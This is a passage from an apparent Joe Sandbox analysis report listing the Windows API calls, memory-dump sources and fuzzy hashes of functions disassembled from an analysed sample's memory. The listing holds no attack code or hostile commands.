                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _free$Process$CurrentFeaturePresentProcessorTerminate
                                                                      • String ID:
                                                                      • API String ID: 2329545287-0
                                                                      • Opcode ID: ce5445a176509108f1d04d0cabb4a20a2b286554709af09773f197c8f2e1bdf4
                                                                      • Instruction ID: af3d3bfb63ed6826f61314a5ad25adbdf531388f2409aa6adf4908af5b6a089c
                                                                      • Opcode Fuzzy Hash: ce5445a176509108f1d04d0cabb4a20a2b286554709af09773f197c8f2e1bdf4
                                                                      • Instruction Fuzzy Hash: 6351CE7E9042045BDF249F68D845BBAB7E8DF45366F2C015DFC049B241E632AEC98398
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00C482D9,00C482D9,?,?,?,00C5644F,00000001,00000001,8BE85006), ref: 00C56258
                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00C5644F,00000001,00000001,8BE85006,?,?,?), ref: 00C562DE
                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00C563D8
                                                                      • __freea.LIBCMT ref: 00C563E5
                                                                        • Part of subcall function 00C53820: RtlAllocateHeap.NTDLL(00000000,?,00CF1444,?,00C3FDF5,?,?,00C2A976,00000010,00CF1440,00C213FC,?,00C213C6,?,00C21129), ref: 00C53852
                                                                      • __freea.LIBCMT ref: 00C563EE
                                                                      • __freea.LIBCMT ref: 00C56413
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1414292761-0
                                                                      • Opcode ID: eb6297cff7d4217afb6b086fc972d790ce0573bd6f99cc5f815b4b73de2210b2
                                                                      • Instruction ID: 54b887fd6fa2180423730db8a81e5e33e25cd9e73069f8a996c8404f625376ba
                                                                      • Opcode Fuzzy Hash: eb6297cff7d4217afb6b086fc972d790ce0573bd6f99cc5f815b4b73de2210b2
                                                                      • Instruction Fuzzy Hash: A0514276600206ABEB258F64CC81FAF7BA9EF40752F540228FD15D7150EB30DDC8D668
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(00000035), ref: 00C7F7B9
                                                                      • SysAllocString.OLEAUT32(00000001), ref: 00C7F860
                                                                      • VariantCopy.OLEAUT32(00C7FA64,00000000), ref: 00C7F889
                                                                      • VariantClear.OLEAUT32(00C7FA64), ref: 00C7F8AD
                                                                      • VariantCopy.OLEAUT32(00C7FA64,00000000), ref: 00C7F8B1
                                                                      • VariantClear.OLEAUT32(?), ref: 00C7F8BB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearCopy$AllocInitString
                                                                      • String ID:
                                                                      • API String ID: 3859894641-0
                                                                      • Opcode ID: 6094626367ef23155693732a41b922de3b064320bdb01a2178acdb3be6c05f65
                                                                      • Instruction ID: 990e37dac8d1bbf010a18450e8c51687961d76f34644beff303bfc776984eb10
                                                                      • Opcode Fuzzy Hash: 6094626367ef23155693732a41b922de3b064320bdb01a2178acdb3be6c05f65
                                                                      • Instruction Fuzzy Hash: 7851A431510310AACF24AF66D8D5B69B3A4FF45310F24D46EE909EF291DB708D42DB66
                                                                      APIs
                                                                        • Part of subcall function 00C27620: _wcslen.LIBCMT ref: 00C27625
                                                                        • Part of subcall function 00C26B57: _wcslen.LIBCMT ref: 00C26B6A
                                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00C994E5
                                                                      • _wcslen.LIBCMT ref: 00C99506
                                                                      • _wcslen.LIBCMT ref: 00C9952D
                                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00C99585
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$FileName$OpenSave
                                                                      • String ID: X
                                                                      • API String ID: 83654149-3081909835
                                                                      • Opcode ID: 1af749f86e90c93eb5adbb8d265054023e3093db117c7c187fae35431c0144b8
                                                                      • Instruction ID: 20f26777dacd9138a649f68ff72ee51f90cd663b514d1dcf9649090f1d9d4e05
                                                                      • Opcode Fuzzy Hash: 1af749f86e90c93eb5adbb8d265054023e3093db117c7c187fae35431c0144b8
                                                                      • Instruction Fuzzy Hash: 3DE1B2315083519FCB24EF28D485B6AB7E4FF85310F04896DF8999B2A2DB31DD05CB92
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00C964DC
                                                                      • CoInitialize.OLE32(00000000), ref: 00C96639
                                                                      • CoCreateInstance.OLE32(00CBFCF8,00000000,00000001,00CBFB68,?), ref: 00C96650
                                                                      • CoUninitialize.OLE32 ref: 00C968D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                      • String ID: .lnk
                                                                      • API String ID: 886957087-24824748
                                                                      • Opcode ID: a850f8605042a1667c0f79272fa434de86bd88a0441e4bc049ec7c86e2ffc337
                                                                      • Instruction ID: 2f8a7ae5ca490946edc82139a422ab9b74beba1427033d999e81a3021b2fe96f
                                                                      • Opcode Fuzzy Hash: a850f8605042a1667c0f79272fa434de86bd88a0441e4bc049ec7c86e2ffc337
                                                                      • Instruction Fuzzy Hash: 65D14971508211AFC704EF24D895E6BB7E8FF98704F00496DF5958B2A1DB71EE09CBA2
                                                                      APIs
                                                                        • Part of subcall function 00C39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C39BB2
                                                                      • BeginPaint.USER32(?,?,?), ref: 00C39241
                                                                      • GetWindowRect.USER32(?,?), ref: 00C392A5
                                                                      • ScreenToClient.USER32(?,?), ref: 00C392C2
                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00C392D3
                                                                      • EndPaint.USER32(?,?,?,?,?), ref: 00C39321
                                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00C771EA
                                                                        • Part of subcall function 00C39339: BeginPath.GDI32(00000000), ref: 00C39357
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                      • String ID:
                                                                      • API String ID: 3050599898-0
                                                                      • Opcode ID: adf8c78dc13431891a6aa79961793355daf014d0d4803785ac40ed104481342e
                                                                      • Instruction ID: a4705835bcde36f9d4a0b90625ac400f8eb97127c83331f0854cf097d2d16234
                                                                      • Opcode Fuzzy Hash: adf8c78dc13431891a6aa79961793355daf014d0d4803785ac40ed104481342e
                                                                      • Instruction Fuzzy Hash: 5341AC70104200EFD721DF25DCC4FBA7BB8EB45324F040269F9A9972B1C7B19945DBA2
                                                                      APIs
                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00C9080C
                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00C90847
                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00C90863
                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00C908DC
                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00C908F3
                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C90921
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                      • String ID:
                                                                      • API String ID: 3368777196-0
                                                                      • Opcode ID: bbfc6d41741fb44fbbe4a8031098e0fb04c352948227e46a330129c8daede664
                                                                      • Instruction ID: b6f6c1e65d4c285d3e685e472c2a45b3fd74e5234dbae69bdfe51df2a36fc2ee
                                                                      • Opcode Fuzzy Hash: bbfc6d41741fb44fbbe4a8031098e0fb04c352948227e46a330129c8daede664
                                                                      • Instruction Fuzzy Hash: 1A416871A00205EFDF14AF54DC85AAA77B8FF04300F2440A9ED00AA297DB30DE65DBA4
                                                                      APIs
                                                                      • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00C7F3AB,00000000,?,?,00000000,?,00C7682C,00000004,00000000,00000000), ref: 00CB824C
                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00CB8272
                                                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00CB82D1
                                                                      • ShowWindow.USER32(00000000,00000004), ref: 00CB82E5
                                                                      • EnableWindow.USER32(00000000,00000001), ref: 00CB830B
                                                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00CB832F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                      • String ID:
                                                                      • API String ID: 642888154-0
                                                                      • Opcode ID: 825c9dc925f7c1c0182efeaf11900bb516e2e15922d6801eea108be3978c4236
                                                                      • Instruction ID: 4a80379c8908f9b9f9b210089d09961daea0fee67ef84f02f58cae23bdd6ba2b
                                                                      • Opcode Fuzzy Hash: 825c9dc925f7c1c0182efeaf11900bb516e2e15922d6801eea108be3978c4236
                                                                      • Instruction Fuzzy Hash: 27419434601644EFDF11CF15C899BE87BE4BB1A714F1842A9E9184F272CB71AE49CB52
                                                                      APIs
                                                                      • IsWindowVisible.USER32(?), ref: 00C84C95
                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C84CB2
                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C84CEA
                                                                      • _wcslen.LIBCMT ref: 00C84D08
                                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C84D10
                                                                      • _wcsstr.LIBVCRUNTIME ref: 00C84D1A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                      • String ID:
                                                                      • API String ID: 72514467-0
                                                                      • Opcode ID: 0261724151816776769f577871d5fdb83ca55115336ebbf01fe522933fd3ee5e
                                                                      • Instruction ID: 4656be4d90b0af2b7b4eb8087158d82014da3003959322e8cfc53af23865882e
                                                                      • Opcode Fuzzy Hash: 0261724151816776769f577871d5fdb83ca55115336ebbf01fe522933fd3ee5e
                                                                      • Instruction Fuzzy Hash: 79210872604211BBEB196B3AEC49F7F7BACDF45754F10803EF805CA191EA61DD0197A4
                                                                      APIs
                                                                        • Part of subcall function 00C23AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C23A97,?,?,00C22E7F,?,?,?,00000000), ref: 00C23AC2
                                                                      • _wcslen.LIBCMT ref: 00C9587B
                                                                      • CoInitialize.OLE32(00000000), ref: 00C95995
                                                                      • CoCreateInstance.OLE32(00CBFCF8,00000000,00000001,00CBFB68,?), ref: 00C959AE
                                                                      • CoUninitialize.OLE32 ref: 00C959CC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                      • String ID: .lnk
                                                                      • API String ID: 3172280962-24824748
                                                                      • Opcode ID: 289912d2cd243c56ee1e39308b4bf9d6c74d043426857d812cb1cd75b161ff22
                                                                      • Instruction ID: e22d39b16fb5e12e03e240869af5bf18fad8fc768d51ed5b84a399aa9146ce26
                                                                      • Opcode Fuzzy Hash: 289912d2cd243c56ee1e39308b4bf9d6c74d043426857d812cb1cd75b161ff22
                                                                      • Instruction Fuzzy Hash: B4D164716047119FCB14DF28C488A2ABBE1FF89710F14896DF8999B361DB31ED46CB92
                                                                      APIs
                                                                        • Part of subcall function 00C80FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C80FCA
                                                                        • Part of subcall function 00C80FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C80FD6
                                                                        • Part of subcall function 00C80FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C80FE5
                                                                        • Part of subcall function 00C80FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C80FEC
                                                                        • Part of subcall function 00C80FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C81002
                                                                      • GetLengthSid.ADVAPI32(?,00000000,00C81335), ref: 00C817AE
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C817BA
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00C817C1
                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 00C817DA
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00C81335), ref: 00C817EE
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C817F5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                      • String ID:
                                                                      • API String ID: 3008561057-0
                                                                      • Opcode ID: 461e2410121c2f70899a3c652562ad7e41e8d14b9c031eb39232218fe05e4491
                                                                      • Instruction ID: 7cfab86b4829dc61cfed4071c72a26bfb71d5cccdcb666b337f77d58bf156137
                                                                      • Opcode Fuzzy Hash: 461e2410121c2f70899a3c652562ad7e41e8d14b9c031eb39232218fe05e4491
                                                                      • Instruction Fuzzy Hash: C411AC72500205FFDB10AFA8DC89BAE7BEDEB41359F18411DF881A7210C735AA45CB64
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C814FF
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00C81506
                                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C81515
                                                                      • CloseHandle.KERNEL32(00000004), ref: 00C81520
                                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C8154F
                                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00C81563
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                      • String ID:
                                                                      • API String ID: 1413079979-0
                                                                      • Opcode ID: ddc5305e40b9db596df9c2b3fdb167aafbecd34bc706a54a30e18f2bf6b562e1
                                                                      • Instruction ID: 51db26dc862fea9ff23dfbae7a1e2c3be45b2de6c767b7b7e4a2ba2341f1fefd
                                                                      • Opcode Fuzzy Hash: ddc5305e40b9db596df9c2b3fdb167aafbecd34bc706a54a30e18f2bf6b562e1
                                                                      • Instruction Fuzzy Hash: 88115972504209ABDF119F98ED89FDE7BADEF48718F088124FE15A2060C3758E61DB60
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,00C43379,00C42FE5), ref: 00C43390
                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C4339E
                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C433B7
                                                                      • SetLastError.KERNEL32(00000000,?,00C43379,00C42FE5), ref: 00C43409
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastValue___vcrt_
                                                                      • String ID:
                                                                      • API String ID: 3852720340-0
                                                                      • Opcode ID: 65f067905b16b2974328cca6dbe2433e1768148e1a02f055c07ee2561a8128a5
                                                                      • Instruction ID: c4eea27888a31e2114a075bdc8d7b112f357a0fa3e7d7e84051fe99241149b2c
                                                                      • Opcode Fuzzy Hash: 65f067905b16b2974328cca6dbe2433e1768148e1a02f055c07ee2561a8128a5
                                                                      • Instruction Fuzzy Hash: 4E01D4336093A2BEA6292B757CC5BAF2EA4FB957797200229F530852F1EF114F036544
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,00C55686,00C63CD6,?,00000000,?,00C55B6A,?,?,?,?,?,00C4E6D1,?,00CE8A48), ref: 00C52D78
                                                                      • _free.LIBCMT ref: 00C52DAB
                                                                      • _free.LIBCMT ref: 00C52DD3
                                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,00C4E6D1,?,00CE8A48,00000010,00C24F4A,?,?,00000000,00C63CD6), ref: 00C52DE0
                                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,00C4E6D1,?,00CE8A48,00000010,00C24F4A,?,?,00000000,00C63CD6), ref: 00C52DEC
                                                                      • _abort.LIBCMT ref: 00C52DF2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$_free$_abort
                                                                      • String ID:
                                                                      • API String ID: 3160817290-0
                                                                      • Opcode ID: 9c0464613d2ccae15dedbf6a6573479cab6ee0190a1f5d47c54718cf470ab030
                                                                      • Instruction ID: 86dbce0b7ecbd49f5b152023c23c40247a3b84725771b1304143fe33be48a725
                                                                      • Opcode Fuzzy Hash: 9c0464613d2ccae15dedbf6a6573479cab6ee0190a1f5d47c54718cf470ab030
                                                                      • Instruction Fuzzy Hash: BBF0A43E504A0027C2122735AC46F5E26E9ABD37A3F244519FC34A21E2EF2489CEA168
                                                                      APIs
                                                                      • GetDC.USER32(00000000), ref: 00C85218
                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00C85229
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C85230
                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00C85238
                                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C8524F
                                                                      • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00C85261
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CapsDevice$Release
                                                                      • String ID:
                                                                      • API String ID: 1035833867-0
                                                                      • Opcode ID: 8ba81f0e943880d26276a8ae79dbcd80dab63389c56c69099340ca5cfc8770e8
                                                                      • Instruction ID: c3434d36a12fc9dedc797d275c028cb886714c15cd83d2ca59f358335ea2cd9d
                                                                      • Opcode Fuzzy Hash: 8ba81f0e943880d26276a8ae79dbcd80dab63389c56c69099340ca5cfc8770e8
                                                                      • Instruction Fuzzy Hash: E2016275E00718BBEB10ABE99C89F5EBFB8EF48751F044165FA04A7281DA709D00CFA0
                                                                      APIs
                                                                        • Part of subcall function 00C39639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C39693
                                                                        • Part of subcall function 00C39639: SelectObject.GDI32(?,00000000), ref: 00C396A2
                                                                        • Part of subcall function 00C39639: BeginPath.GDI32(?), ref: 00C396B9
                                                                        • Part of subcall function 00C39639: SelectObject.GDI32(?,00000000), ref: 00C396E2
                                                                      • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00CB8A4E
